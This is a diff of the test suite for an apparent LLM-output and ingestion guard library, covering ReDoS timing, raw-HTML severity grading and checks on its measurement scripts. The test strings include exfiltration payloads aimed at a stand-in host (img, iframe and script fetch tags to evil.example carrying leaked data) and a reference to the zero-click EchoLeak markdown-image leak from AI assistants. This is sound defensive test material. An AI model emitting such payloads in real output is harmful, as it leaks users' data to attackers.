raise OKFFrontmatterError("invalid flow-mapping key: %r" % (key,))
|
||||||
|
if key not in _MAPPING_KEY_ALLOWLIST:
|
||||||
|
raise OKFFrontmatterError(
|
||||||
|
"flow-mapping key %r is not on the OKF mapping allowlist: %r"
|
||||||
|
% (key, value)
|
||||||
|
)
|
||||||
|
if key in mapping:
|
||||||
|
raise OKFFrontmatterError(
|
||||||
|
"duplicate flow-mapping key %r: %r" % (key, value)
|
||||||
|
)
|
||||||
|
_reject_dangerous_value(leaf)
|
||||||
|
_reject_mapping_construct(leaf)
|
||||||
|
mapping[key] = leaf
|
||||||
|
return mapping
|
||||||
|
|
|
||||||
38
tests/redos_clock.py
Normal file
38
tests/redos_clock.py
Normal file
|
|
@ -0,0 +1,38 @@
|
||||||
|
"""The one clock every ReDoS bound in this suite is measured against.
|
||||||
|
|
||||||
|
Process CPU time, not wall clock: a ReDoS blowup is spent cycles, and a loaded
|
||||||
|
machine steals wall clock without adding any. In 0.7.0 these bounds ran on
|
||||||
|
``time.monotonic()`` and two of them failed at 2.24s / 3.66s against a 2.0s
|
||||||
|
bound while two census processes had the CPU; the same rows passed 3/3 on an
|
||||||
|
idle machine. The scans had not slowed down — they were descheduled.
|
||||||
|
|
||||||
|
This lives in its own module, imported by all six test files, rather than being
|
||||||
|
copied into each. The suite already holds that rule for the code it measures
|
||||||
|
("never re-implement a predicate you measure — import it"), and it binds harder
|
||||||
|
here: ``test_output.py::test_the_redos_clock_ignores_time_this_process_did_not_spend``
|
||||||
|
pins ONE implementation. Five copies would leave four of them unpinned and free
|
||||||
|
to drift back to a wall clock without a single test going red.
|
||||||
|
|
||||||
|
What this clock gives up: a scan that BLOCKS forever burns no CPU, so it would
|
||||||
|
hang the suite instead of failing it. Acceptable for every caller here — these
|
||||||
|
scanners are pure regex over an in-memory string, with no I/O and no locks, so
|
||||||
|
the only way they can be slow is by spending cycles. That is not a concession
|
||||||
|
made grudgingly per row: ``test_pathological_input_returns_within_a_bound`` was
|
||||||
|
the last holdout, kept on a wall clock precisely to catch a blocking hang, and
|
||||||
|
it was retired once the path was checked for anything that could block and
|
||||||
|
found to contain none. A wall clock that guards an impossible mode still
|
||||||
|
charges the full false-red premium — measured there at 21.6s against a 10.0s
|
||||||
|
bound under load, on a scan that spent 7.6s.
|
||||||
|
"""
|
||||||
|
import time
|
||||||
|
|
||||||
|
|
||||||
|
def scan_seconds(scanner, payload) -> float:
|
||||||
|
"""CPU seconds ``scanner(payload)`` cost.
|
||||||
|
|
||||||
|
Pinned by ``test_the_redos_clock_ignores_time_this_process_did_not_spend``
|
||||||
|
in ``test_output.py``, which carries the measurements behind the choice.
|
||||||
|
"""
|
||||||
|
start = time.process_time()
|
||||||
|
scanner(payload)
|
||||||
|
return time.process_time() - start
|
||||||
|
|
@ -18,8 +18,6 @@ from __future__ import annotations
|
||||||
|
|
||||||
import pytest
|
import pytest
|
||||||
|
|
||||||
import time
|
|
||||||
|
|
||||||
from llm_ingestion_guard import (
|
from llm_ingestion_guard import (
|
||||||
scan_active_content,
|
scan_active_content,
|
||||||
scan_output,
|
scan_output,
|
||||||
|
|
@ -29,6 +27,7 @@ from llm_ingestion_guard import (
|
||||||
)
|
)
|
||||||
from llm_ingestion_guard.okf import import_bundle, Origin, Channel
|
from llm_ingestion_guard.okf import import_bundle, Origin, Channel
|
||||||
from llm_ingestion_guard.report import Severity, Source
|
from llm_ingestion_guard.report import Severity, Source
|
||||||
|
from redos_clock import scan_seconds
|
||||||
|
|
||||||
# The zero-click EchoLeak primitive: an auto-fetched markdown image URL.
|
# The zero-click EchoLeak primitive: an auto-fetched markdown image URL.
|
||||||
_ECHOLEAK = ""
|
_ECHOLEAK = ""
|
||||||
|
|
@ -267,16 +266,111 @@ def test_default_source_is_output_and_override_respected():
|
||||||
# Documented in docs/LIMITATIONS.md. Pinned so the concessions stay honest: a
|
# Documented in docs/LIMITATIONS.md. Pinned so the concessions stay honest: a
|
||||||
# closed over-block should fail here and force the doc to be updated.
|
# closed over-block should fail here and force the doc to be updated.
|
||||||
|
|
||||||
|
# --- the carrier split and the no-URL narrowing (0.7.0) ----------------------
|
||||||
|
# Two changes that had to ship together: measured alone they free 9 / 21 of
|
||||||
|
# vendor-harvest's 62 fail_secure documents, together 43 of an achievable 44.
|
||||||
|
# They co-occur — the no-URL narrowing removes a document's `</a>` and `<Frame>`
|
||||||
|
# tags, and what is left is the `<a href=...>` the carrier split grades down, so
|
||||||
|
# each change alone leaves the document blocked by the other's residue. Method
|
||||||
|
# and numbers: `docs/rawhtml-census.py`.
|
||||||
|
|
||||||
|
def test_raw_anchor_is_the_link_class_at_medium():
|
||||||
|
# Following an anchor needs a human, exactly like a markdown inline link —
|
||||||
|
# which has been MEDIUM since 0.3.1. The same URL was HIGH here and LOW as
|
||||||
|
# `[t](...)`, an asymmetry that came from syntax, not affordance.
|
||||||
|
finding = [f for f in scan_active_content(
|
||||||
|
'<a href="https://evil.example/go?d=account">t</a>').findings
|
||||||
|
if f.label == "active:raw-html-link"]
|
||||||
|
assert len(finding) == 1, "anchor not reported as the link class"
|
||||||
|
assert finding[0].severity is Severity.MEDIUM, finding[0].severity
|
||||||
|
|
||||||
|
|
||||||
|
def test_zero_click_carriers_keep_raw_html_at_high():
|
||||||
|
# The split moves ONLY the click-required carriers. Anything a renderer
|
||||||
|
# fetches or executes unattended stays where it was.
|
||||||
|
for text in ('<img src="https://evil.example/leak?d=x">',
|
||||||
|
'<iframe src="https://evil.example/x">',
|
||||||
|
"<script>fetch('https://evil.example/x')</script>"):
|
||||||
|
finding = [f for f in scan_active_content(text).findings
|
||||||
|
if f.label == "active:raw-html"]
|
||||||
|
assert finding and finding[0].severity is Severity.HIGH, text
|
||||||
|
|
||||||
|
|
||||||
|
def test_event_handler_on_an_anchor_stays_high():
|
||||||
|
# An `onclick=` anchor is execute-class, not click-required-carrier class.
|
||||||
|
# The handler test runs BEFORE the name test, so the split cannot grade an
|
||||||
|
# XSS carrier down to MEDIUM.
|
||||||
|
labels = {f.label for f in scan_active_content(
|
||||||
|
'<a href="https://x.example/p" onclick="fetch(1)">t</a>').findings}
|
||||||
|
assert "active:raw-html" in labels
|
||||||
|
assert "active:raw-html-link" not in labels
|
||||||
|
|
||||||
|
|
||||||
|
def test_mixed_document_reports_both_classes_separately():
|
||||||
|
# The class collapses to one finding, so a document carrying both must not
|
||||||
|
# lose the anchor behind the script — nor grade the script down to the
|
||||||
|
# anchor's severity.
|
||||||
|
report = scan_active_content(
|
||||||
|
'<script>x()</script> and <a href="https://x.example/p?d=1">t</a>')
|
||||||
|
by_label = {f.label: f for f in report.findings}
|
||||||
|
assert by_label["active:raw-html"].severity is Severity.HIGH
|
||||||
|
assert by_label["active:raw-html-link"].severity is Severity.MEDIUM
|
||||||
|
|
||||||
|
|
||||||
|
def test_link_class_has_no_ordinary_form():
|
||||||
|
# Raw HTML grades on carrier only, never on URL shape — measured: applying
|
||||||
|
# `is_ordinary_url` to raw tags frees 1 / 1 / 0 documents, because real
|
||||||
|
# vendor-doc image URLs are not ordinary. A third tier here would be a
|
||||||
|
# severity nobody decided on.
|
||||||
|
finding = [f for f in scan_active_content(
|
||||||
|
'<a href="https://learn.microsoft.com/en-us/azure/overview">t</a>').findings
|
||||||
|
if f.label == "active:raw-html-link"]
|
||||||
|
assert finding and finding[0].severity is Severity.MEDIUM, finding
|
||||||
|
|
||||||
|
|
||||||
@pytest.mark.parametrize("cid,text", [
|
@pytest.mark.parametrize("cid,text", [
|
||||||
# Fires on the *name* branch: names are lower-cased and `frame` is in the
|
# `</a>` — 146 occurrences inside vendor-harvest's fail_secure documents.
|
||||||
# active set (legacy HTML framesets), while `Frame` is a common MDX component.
|
("end-tag-names-no-target", "</a>"),
|
||||||
|
# `<Frame>` / `</Frame>` — a common MDX wrapper component, 94 occurrences.
|
||||||
("mdx-component-named-like-a-tag", "<Frame>"),
|
("mdx-component-named-like-a-tag", "<Frame>"),
|
||||||
|
("mdx-component-end-tag", "</Frame>"),
|
||||||
|
# `<video />`, 19 occurrences: a self-closing media tag naming no source.
|
||||||
|
("self-closing-media", "<video />"),
|
||||||
|
("anchor-without-href", "<a />"),
|
||||||
|
# An `<img>` carrying alt text but no `src` fetches nothing.
|
||||||
|
("img-without-src", '<img alt="Diagram of the agent loop">'),
|
||||||
])
|
])
|
||||||
def test_raw_html_overblocks_are_still_high(cid, text):
|
def test_url_affordance_tag_without_a_url_is_not_active(cid, text):
|
||||||
finding = [f for f in scan_active_content(text).findings
|
# A tag whose whole affordance IS the URL it names, carrying no URL
|
||||||
if f.label == "active:raw-html"]
|
# attribute at all, has no affordance in any renderer — the argument 0.6.0
|
||||||
assert len(finding) == 1, f"{cid}: raw-html not reported"
|
# already accepted for `<base />`, applied to the rest of the name branch.
|
||||||
assert finding[0].severity is Severity.HIGH, f"{cid}: {finding[0].severity}"
|
assert not [f for f in scan_active_content(text).findings
|
||||||
|
if f.label.startswith("active:raw-html")], cid
|
||||||
|
|
||||||
|
|
||||||
|
@pytest.mark.parametrize("cid,text", [
|
||||||
|
("relative-src-still-active", '<img src="/local/diagram.png">'),
|
||||||
|
("relative-href-still-active", '<a href="/en/quickstart">t</a>'),
|
||||||
|
# The narrowing tests for the ATTRIBUTE's presence, not for a readable value:
|
||||||
|
# a value the parser cannot resolve must over-block, never under-block. The
|
||||||
|
# corpora carry 0 of these today, which is empirical, not structural.
|
||||||
|
("unreadable-value-fails-secure", "<img src= >"),
|
||||||
|
("event-handler-without-url", '<a onclick="fetch(1)">t</a>'),
|
||||||
|
])
|
||||||
|
def test_url_affordance_narrowing_only_frees_the_attribute_less(cid, text):
|
||||||
|
assert [f for f in scan_active_content(text).findings
|
||||||
|
if f.label.startswith("active:raw-html")], cid
|
||||||
|
|
||||||
|
|
||||||
|
def test_unknown_name_with_an_external_url_stays_high():
|
||||||
|
# The url-attribute branch is deliberately NOT in the link class: a tag
|
||||||
|
# outside the known name set has unknown rendering, and `href` is not the
|
||||||
|
# only URL attribute it may carry. Measured cost of the conservative line:
|
||||||
|
# one document per wiki corpus.
|
||||||
|
finding = [f for f in scan_active_content(
|
||||||
|
'<Card title="Docs" href="https://evil.example/leak?d=x">').findings
|
||||||
|
if f.label == "active:raw-html"]
|
||||||
|
assert len(finding) == 1 and finding[0].severity is Severity.HIGH, finding
|
||||||
|
|
||||||
|
|
||||||
# --- the two over-blocks CLOSED in 0.6.0 (the `A + base-url` narrowing) -------
|
# --- the two over-blocks CLOSED in 0.6.0 (the `A + base-url` narrowing) -------
|
||||||
|
|
@ -324,18 +418,19 @@ def test_external_url_attr_is_still_active(cid, text):
|
||||||
assert finding[0].severity is Severity.HIGH, f"{cid}: {finding[0].severity}"
|
assert finding[0].severity is Severity.HIGH, f"{cid}: {finding[0].severity}"
|
||||||
|
|
||||||
|
|
||||||
def test_raw_html_counts_end_tags():
|
def test_raw_html_no_longer_counts_end_tags():
|
||||||
# `</a>` is active by name on its own, so a corpus census counting only opening
|
# Through 0.6.1 `</a>` was active by name on its own, so `count` ran roughly
|
||||||
# tags understates this detector's `count`. The class still collapses to ONE
|
# 1.6x the opening-tag total and a start/end pair counted 2. The no-URL
|
||||||
# finding — the count is what moves.
|
# narrowing makes an end tag inert — it names no target — so `count` is now
|
||||||
solo = [f for f in scan_active_content("</a>").findings
|
# the opening-tag total. This is a PUBLISHED field moving: a consumer reading
|
||||||
if f.label == "active:raw-html"]
|
# `count` sees it drop for every document carrying `</a>`.
|
||||||
assert len(solo) == 1 and solo[0].count == 1
|
assert not [f for f in scan_active_content("</a>").findings
|
||||||
|
if f.label.startswith("active:raw-html")]
|
||||||
|
|
||||||
pair = [f for f in scan_active_content('<a href="https://x.example/p">t</a>').findings
|
pair = [f for f in scan_active_content('<a href="https://x.example/p">t</a>').findings
|
||||||
if f.label == "active:raw-html"]
|
if f.label == "active:raw-html-link"]
|
||||||
assert len(pair) == 1, "a start/end pair must not split into two findings"
|
assert len(pair) == 1, "a start/end pair must not split into two findings"
|
||||||
assert pair[0].count == 2, f"end tag not counted: {pair[0].count}"
|
assert pair[0].count == 1, f"end tag still counted: {pair[0].count}"
|
||||||
|
|
||||||
|
|
||||||
# --- self-safety (OWASP LLM10): the long-attribute arm -----------------------
|
# --- self-safety (OWASP LLM10): the long-attribute arm -----------------------
|
||||||
|
|
@ -351,10 +446,25 @@ _ATTR_REDOS_N = 100_000
|
||||||
|
|
||||||
|
|
||||||
def test_crafted_long_attribute_tag_stays_bounded():
|
def test_crafted_long_attribute_tag_stays_bounded():
|
||||||
payload = "<a " + "A" * _ATTR_REDOS_N + ">"
|
# The carrier is `<script `, not the `<a ` this row shipped with through
|
||||||
start = time.monotonic()
|
# 0.7.0, because 0.7.0's own no-URL narrowing killed the row: `<a>` is in
|
||||||
scan_active_content(payload)
|
# `_URL_AFFORDANCE_TAGS`, so a bare `<a ...>` carrying no URL attribute is
|
||||||
assert time.monotonic() - start < 2.0
|
# inert and returns BEFORE its body reaches `URL_IN_TEXT_RE` — the arm this
|
||||||
|
# row exists to guard. Re-measured here with the pre-fix uncapped scheme run
|
||||||
|
# patched back in, at _ATTR_REDOS_N through `scan_active_content`:
|
||||||
|
#
|
||||||
|
# <a ...> 0.041s and NO findings <- dead: never reaches the arm
|
||||||
|
# <script ...> 19.349s and one finding <- the arm, still quadratic
|
||||||
|
#
|
||||||
|
# So the `<a ` row was green against the vulnerable form — separation 1.2x,
|
||||||
|
# zero signal. With `<script ` it is 0.052s shipped vs 19.349s vulnerable,
|
||||||
|
# 373x apart, with the bound 38x above the shipped side. `<script>` is the
|
||||||
|
# durable carrier: active by NAME with no attributes at all, so no future
|
||||||
|
# URL-shaped narrowing can make it inert the way it just did to `<a >`.
|
||||||
|
# Same fix, same reason, as test_output.py::test_gate_is_bounded_on_the_
|
||||||
|
# long_attribute_arm — the composed-gate twin of this row.
|
||||||
|
payload = "<script " + "A" * _ATTR_REDOS_N + ">"
|
||||||
|
assert scan_seconds(scan_active_content, payload) < 2.0
|
||||||
|
|
||||||
|
|
||||||
def test_url_defanging_survives_the_redos_fix():
|
def test_url_defanging_survives_the_redos_fix():
|
||||||
|
|
|
||||||
|
|
@ -60,6 +60,7 @@ def test_active_content_severity_frozen():
|
||||||
"reference-link": Severity.MEDIUM,
|
"reference-link": Severity.MEDIUM,
|
||||||
"autolink": Severity.MEDIUM,
|
"autolink": Severity.MEDIUM,
|
||||||
"raw-html": Severity.HIGH,
|
"raw-html": Severity.HIGH,
|
||||||
|
"raw-html-link": Severity.MEDIUM,
|
||||||
"data-uri": Severity.HIGH,
|
"data-uri": Severity.HIGH,
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|
|
||||||
305
tests/test_docs_measurement_scripts.py
Normal file
305
tests/test_docs_measurement_scripts.py
Normal file
|
|
@ -0,0 +1,305 @@
|
||||||
|
"""The `docs/` measurement scripts are contract consumers, and nothing pinned them.
|
||||||
|
|
||||||
|
`docs/fp-sweep.py` and `docs/rawhtml-census.py` produce the numbers published in
|
||||||
|
`docs/LIMITATIONS.md` and the README. Both reach past the public API into private
|
||||||
|
module state — `active_content._ACTIVE_TAGS`, `calibration.RISK_RANK` — so a rename
|
||||||
|
inside `src/` breaks them while this suite stays green. The breakage then surfaces
|
||||||
|
at the worst possible moment: the next time someone tries to re-measure a published
|
||||||
|
claim, months later, with no memory of what the script was supposed to import.
|
||||||
|
|
||||||
|
WHAT THIS FILE DELIBERATELY DOES NOT DO. The corpora these scripts consume live
|
||||||
|
outside this repo, in private consumer repos (`docs/CONSUMER-MAP.local.md`), so no
|
||||||
|
test here can run either script end to end, and building a stand-in corpus would
|
||||||
|
just pin a fiction. The contract under test is therefore narrower and honest:
|
||||||
|
|
||||||
|
1. every name the scripts import still exists with the shape they use;
|
||||||
|
2. the in-process patch point still moves the gate (a census that patched a dead
|
||||||
|
symbol would print six identical rows and read as a finding, not a failure);
|
||||||
|
3. the census's `PRODUCTION` row still equals its `A + base-url` candidate, which
|
||||||
|
the script's own docstring calls the drift alarm for every number it prints;
|
||||||
|
4. the argument-less invocation still refuses rather than measuring nothing.
|
||||||
|
"""
|
||||||
|
from __future__ import annotations
|
||||||
|
|
||||||
|
import importlib.util
|
||||||
|
import subprocess
|
||||||
|
import sys
|
||||||
|
from pathlib import Path
|
||||||
|
|
||||||
|
import pytest
|
||||||
|
|
||||||
|
import redos_clock
|
||||||
|
from llm_ingestion_guard import Disposition, PRESET_USER_UPLOAD, Risk, screen_output
|
||||||
|
from llm_ingestion_guard import active_content as ac
|
||||||
|
|
||||||
|
_DOCS = Path(__file__).resolve().parent.parent / "docs"
|
||||||
|
_LIMITATIONS = _DOCS / "LIMITATIONS.md"
|
||||||
|
|
||||||
|
|
||||||
|
def _load(filename: str):
|
||||||
|
"""Import a hyphenated script from `docs/` under a module name Python allows."""
|
||||||
|
path = _DOCS / filename
|
||||||
|
name = f"_docs_{path.stem.replace('-', '_')}"
|
||||||
|
spec = importlib.util.spec_from_file_location(name, path)
|
||||||
|
assert spec and spec.loader, f"cannot load {path}"
|
||||||
|
module = importlib.util.module_from_spec(spec)
|
||||||
|
sys.modules[name] = module # @dataclass resolves its own module via sys.modules
|
||||||
|
spec.loader.exec_module(module)
|
||||||
|
return module
|
||||||
|
|
||||||
|
|
||||||
|
# Import at collection time on purpose: a rename in `src/` that breaks either
|
||||||
|
# script's import list fails the whole file loudly instead of one quiet test.
|
||||||
|
fp_sweep = _load("fp-sweep.py")
|
||||||
|
census = _load("rawhtml-census.py")
|
||||||
|
redos_sweep = _load("redos-sweep.py")
|
||||||
|
|
||||||
|
|
||||||
|
# --- docs/fp-sweep.py --------------------------------------------------------
|
||||||
|
|
||||||
|
|
||||||
|
def test_fp_sweep_reaches_calibration_risk_rank_for_every_risk():
|
||||||
|
# `check_metric_is_a_risk_statement` indexes RISK_RANK by `Risk(...).value`.
|
||||||
|
# A risk tier added to the enum without a rank would raise KeyError mid-sweep,
|
||||||
|
# after the corpus had already been read.
|
||||||
|
from llm_ingestion_guard.calibration import RISK_RANK
|
||||||
|
|
||||||
|
assert {r.value for r in Risk} <= set(RISK_RANK)
|
||||||
|
assert RISK_RANK is fp_sweep.RISK_RANK
|
||||||
|
|
||||||
|
|
||||||
|
def test_fp_sweep_metric_guard_accepts_the_shipped_action_map():
|
||||||
|
fp_sweep.check_metric_is_a_risk_statement() # must not raise
|
||||||
|
|
||||||
|
|
||||||
|
def test_fp_sweep_metric_guard_is_not_vacuous():
|
||||||
|
# The guard exists to catch a re-mapped action map silently changing what the
|
||||||
|
# published number *claims*. If it cannot fail, it protects nothing — so make
|
||||||
|
# it fail, here, on a map where ELEVATED has become benign.
|
||||||
|
remapped = dict(fp_sweep.DEFAULT_ACTION_MAP)
|
||||||
|
remapped[Risk.ELEVATED] = fp_sweep.BENIGN
|
||||||
|
original = fp_sweep.DEFAULT_ACTION_MAP
|
||||||
|
fp_sweep.DEFAULT_ACTION_MAP = remapped
|
||||||
|
try:
|
||||||
|
with pytest.raises(SystemExit, match="metric invalid"):
|
||||||
|
fp_sweep.check_metric_is_a_risk_statement()
|
||||||
|
finally:
|
||||||
|
fp_sweep.DEFAULT_ACTION_MAP = original
|
||||||
|
|
||||||
|
|
||||||
|
def test_fp_sweep_documents_honours_extension_hidden_and_include(tmp_path):
|
||||||
|
(tmp_path / "keep.md").write_text("a", encoding="utf-8")
|
||||||
|
(tmp_path / "skip.rst").write_text("a", encoding="utf-8")
|
||||||
|
(tmp_path / ".hidden").mkdir()
|
||||||
|
(tmp_path / ".hidden" / "buried.md").write_text("a", encoding="utf-8")
|
||||||
|
(tmp_path / "sub").mkdir()
|
||||||
|
(tmp_path / "sub" / "nested.md").write_text("a", encoding="utf-8")
|
||||||
|
|
||||||
|
names = [p.name for p in fp_sweep.documents(tmp_path, (".md",))]
|
||||||
|
assert names == ["keep.md", "nested.md"], "extension or hidden-path filter moved"
|
||||||
|
|
||||||
|
scoped = fp_sweep.documents(tmp_path, (".md",), include="/sub/")
|
||||||
|
assert [p.name for p in scoped] == ["nested.md"]
|
||||||
|
|
||||||
|
|
||||||
|
def test_fp_sweep_measure_reads_the_result_fields_it_publishes(tmp_path):
|
||||||
|
# Two files, not a corpus: this pins the *shape* the script consumes — that
|
||||||
|
# `screen_output` still returns `.disposition` and `.assessment`, that empty
|
||||||
|
# files are excluded from the denominator, and that a non-WARN document is
|
||||||
|
# attributed to the labels at its worst severity rather than to all of them.
|
||||||
|
(tmp_path / "benign.md").write_text("A plain note about deployment.", encoding="utf-8")
|
||||||
|
(tmp_path / "empty.md").write_text(" \n", encoding="utf-8")
|
||||||
|
(tmp_path / "active.md").write_text(
|
||||||
|
'Read more <iframe src="https://evil.example/x"></iframe>', encoding="utf-8"
|
||||||
|
)
|
||||||
|
|
||||||
|
m = fp_sweep.measure("probe", tmp_path, (".md",))
|
||||||
|
|
||||||
|
assert m["n"] == 2, "empty documents must not enter the denominator"
|
||||||
|
assert m["empty"] == 1
|
||||||
|
assert m["non_warn"] == m["n"] - m["dispositions"][fp_sweep.BENIGN.value]
|
||||||
|
assert m["non_warn"] >= 1, "the active-content document should not be waved through"
|
||||||
|
assert sum(m["assessments"].values()) == m["n"]
|
||||||
|
assert sum(m["trusted"].values()) == m["n"]
|
||||||
|
assert m["drivers"], "a non-WARN document must be attributed to a driver label"
|
||||||
|
assert all(isinstance(k, str) for k in m["drivers"])
|
||||||
|
fp_sweep.report(m) # the reporter reads every key above; a rename crashes here
|
||||||
|
|
||||||
|
|
||||||
|
# --- docs/rawhtml-census.py --------------------------------------------------
|
||||||
|
|
||||||
|
|
||||||
|
def test_census_private_active_content_names_still_exist():
|
||||||
|
# Each of these is reached by name from the census. They are private, so
|
||||||
|
# nothing else in the suite would notice them being renamed.
|
||||||
|
assert isinstance(ac._ACTIVE_TAGS, frozenset) and "base" in ac._ACTIVE_TAGS
|
||||||
|
assert ac._EVENT_ATTR_RE.search(' onclick="x()"')
|
||||||
|
assert ac._URL_ATTR_RE.search(' href="/x"')
|
||||||
|
assert ac._has_external_target("//evil.example") is True
|
||||||
|
assert ac._has_external_target("/relative") is False
|
||||||
|
assert ac._url_attr_is_external(' href="//evil.example"') is True
|
||||||
|
assert ac._url_attr_is_external(' href="/relative"') is False
|
||||||
|
assert callable(ac.is_active_tag)
|
||||||
|
assert callable(ac.active_tag_class)
|
||||||
|
# 0.7.0's two name sets, both reached by name from the census's `_variant`.
|
||||||
|
assert "a" in ac._LINK_TAGS and "img" not in ac._LINK_TAGS
|
||||||
|
assert {"a", "frame", "img"} <= ac._URL_AFFORDANCE_TAGS
|
||||||
|
assert "script" not in ac._URL_AFFORDANCE_TAGS, "an execute-class tag needs no URL"
|
||||||
|
|
||||||
|
|
||||||
|
def test_census_masking_pipeline_matches_the_scanner_symbols():
|
||||||
|
# `masked_text` reproduces `scan_active_content`'s masking by name. It blanks
|
||||||
|
# with equal-length spaces so later offsets stay meaningful; a substitution
|
||||||
|
# that changed length would silently move every tag position it reports.
|
||||||
|
text = "See [docs](https://example.com/a) and ."
|
||||||
|
masked = census.masked_text(text)
|
||||||
|
assert len(masked) == len(text)
|
||||||
|
assert "https://example.com/a" not in masked
|
||||||
|
assert not any(m.group("name") for m in ac.HTML_TAG_RE.finditer(masked))
|
||||||
|
|
||||||
|
|
||||||
|
def test_census_html_tag_regex_still_exposes_the_groups_it_reads():
|
||||||
|
m = ac.HTML_TAG_RE.search('<iframe src="https://evil.example/x">')
|
||||||
|
assert m is not None
|
||||||
|
assert m.group("name") == "iframe"
|
||||||
|
assert "src=" in m.group("attrs")
|
||||||
|
|
||||||
|
|
||||||
|
def test_census_candidate_table_keeps_its_three_fixed_rows():
|
||||||
|
names = [name for name, _ in census.CANDIDATES]
|
||||||
|
fns = dict(census.CANDIDATES)
|
||||||
|
assert names[0] == "pre-0.6.0 (no narrowing)", "first row is the baseline the rest subtract from"
|
||||||
|
assert sum(fn is None for _, fn in census.CANDIDATES) == 1, "exactly one unpatched PRODUCTION row"
|
||||||
|
assert fns["PRODUCTION (as shipped)"] is None
|
||||||
|
assert fns["NONE (ceiling)"]("iframe", ' src="https://evil.example"') is None
|
||||||
|
|
||||||
|
|
||||||
|
def test_census_candidates_return_a_class_not_a_boolean():
|
||||||
|
# A boolean patch point cannot express a REGRADE, only a narrowing. If a
|
||||||
|
# candidate ever returns True/False again, every carrier row would compare
|
||||||
|
# equal to PRODUCTION on the non-WARN metric and the script would report
|
||||||
|
# "the split buys nothing" — the exact conclusion it exists to disprove.
|
||||||
|
candidate = dict(census.CANDIDATES)["C1 + D (0.7.0)"]
|
||||||
|
assert candidate("a", ' href="https://evil.example/x?d=1"') == "raw-html-link"
|
||||||
|
assert candidate("script", "") == "raw-html"
|
||||||
|
assert candidate("a", "") is None
|
||||||
|
for value in (True, False):
|
||||||
|
assert candidate("a", ' href="https://evil.example/x"') is not value
|
||||||
|
|
||||||
|
|
||||||
|
def test_census_patch_point_actually_moves_the_gate(monkeypatch):
|
||||||
|
# The census measures candidates by replacing `active_content.active_tag_class`
|
||||||
|
# in-process. If the scanner ever resolves that predicate any other way — a
|
||||||
|
# local alias, an inlined body — every candidate row would silently equal
|
||||||
|
# PRODUCTION and the script would report "no narrowing helps" as a finding.
|
||||||
|
doc = 'Read more <iframe src="https://evil.example/x"></iframe>'
|
||||||
|
assert screen_output(doc, PRESET_USER_UPLOAD).disposition is not Disposition.WARN
|
||||||
|
|
||||||
|
monkeypatch.setattr(ac, "active_tag_class", lambda name, attrs: None)
|
||||||
|
assert screen_output(doc, PRESET_USER_UPLOAD).disposition is Disposition.WARN
|
||||||
|
|
||||||
|
|
||||||
|
def test_census_regrade_patch_point_moves_the_severity(monkeypatch):
|
||||||
|
# The other half: patching the class must move the DISPOSITION TIER, not just
|
||||||
|
# presence. A carrier candidate that regrades without changing the tier would
|
||||||
|
# be unmeasurable, which is how the non-WARN-only metric hid this class.
|
||||||
|
doc = '<img src="https://evil.example/leak?d=x">'
|
||||||
|
assert screen_output(doc, PRESET_USER_UPLOAD).disposition is Disposition.FAIL_SECURE
|
||||||
|
|
||||||
|
monkeypatch.setattr(ac, "active_tag_class", lambda name, attrs: "raw-html-link")
|
||||||
|
assert screen_output(doc, PRESET_USER_UPLOAD).disposition is Disposition.QUARANTINE_REVIEW
|
||||||
|
|
||||||
|
|
||||||
|
# Every branch of the shipped predicate, plus the two shapes where a hand-rolled
|
||||||
|
# attribute reader diverges from it: a URL attribute name reached through a
|
||||||
|
# prefix (`data-src`), and a multi-candidate `srcset` whose external target is
|
||||||
|
# not the first candidate. Both must be exercised on a tag that is NOT in the
|
||||||
|
# name set, or the name branch answers first and hides the disagreement.
|
||||||
|
_PREDICATE_CASES = [
|
||||||
|
("iframe", ' src="https://evil.example/x"'),
|
||||||
|
("script", ""),
|
||||||
|
("base", ' href="https://evil.example/"'),
|
||||||
|
("base", " /"),
|
||||||
|
("div", ' onclick="steal()"'),
|
||||||
|
("div", ' href="//evil.example"'),
|
||||||
|
("div", ' href="/relative/path"'),
|
||||||
|
("div", ' data-src="//evil.example/x"'),
|
||||||
|
("div", ' srcset="a.png 1x, https://evil.example/x.png 2x"'),
|
||||||
|
("div", ' cite="https://evil.example"'),
|
||||||
|
("p", ""),
|
||||||
|
# 0.7.0's two branches. Without these the shipped-candidate check would pass
|
||||||
|
# while the census still measured the 0.6.1 predicate.
|
||||||
|
("a", ' href="https://evil.example/x?d=1"'), # carrier split -> link class
|
||||||
|
("area", ' href="//evil.example"'),
|
||||||
|
("a", ' onclick="steal()"'), # handler beats the split
|
||||||
|
("a", ""), # no-URL narrowing -> inert
|
||||||
|
("frame", ""),
|
||||||
|
("img", ' alt="a diagram"'),
|
||||||
|
("img", ' src="/local/diagram.png"'), # relative URL is still active
|
||||||
|
("script", ' type="module"'), # execute-class needs no URL
|
||||||
|
]
|
||||||
|
|
||||||
|
|
||||||
|
@pytest.mark.parametrize("name,attrs", _PREDICATE_CASES, ids=[f"{n}{a}" for n, a in _PREDICATE_CASES])
|
||||||
|
def test_census_production_row_equals_its_shipped_candidate(name, attrs):
|
||||||
|
# The census's own docstring: "`C1 + D` is what 0.7.0 ships, so these two rows
|
||||||
|
# must agree — a mismatch means the code and this script have drifted apart
|
||||||
|
# and every number below is suspect." That claim was never asserted.
|
||||||
|
candidate = dict(census.CANDIDATES)["C1 + D (0.7.0)"]
|
||||||
|
assert candidate(name, attrs) == ac.active_tag_class(name, attrs)
|
||||||
|
|
||||||
|
|
||||||
|
# --- docs/redos-sweep.py ------------------------------------------------------
|
||||||
|
|
||||||
|
|
||||||
|
def test_redos_sweep_times_on_the_suite_clock_not_a_reimplementation():
|
||||||
|
# Until 1.1.0 this script timed on `time.monotonic()`, a different instrument
|
||||||
|
# than every ReDoS bound in the suite. `t()` must call the shared
|
||||||
|
# `scan_seconds` — imported, not restated — and the module must not import
|
||||||
|
# `time` itself, else a drift back to a wall clock would go unnoticed here.
|
||||||
|
assert redos_sweep.scan_seconds is redos_clock.scan_seconds
|
||||||
|
assert not hasattr(redos_sweep, "time"), "module must not import time itself"
|
||||||
|
|
||||||
|
|
||||||
|
def test_redos_sweep_floor_and_flag_match_the_published_numbers():
|
||||||
|
# docs/LIMITATIONS.md publishes the 1.5 ms floor and the 2.6 flag ratio this
|
||||||
|
# script derives from twelve full runs. Pin both sides: the constants, and
|
||||||
|
# that the doc still states the same numbers — either drifting alone is a bug.
|
||||||
|
assert redos_sweep.NOISE_FLOOR == 0.0015
|
||||||
|
assert redos_sweep.RATIO_FLAG == 2.6
|
||||||
|
text = _LIMITATIONS.read_text(encoding="utf-8")
|
||||||
|
assert "1.5 ms noise floor" in text
|
||||||
|
assert "2.6 flag threshold" in text
|
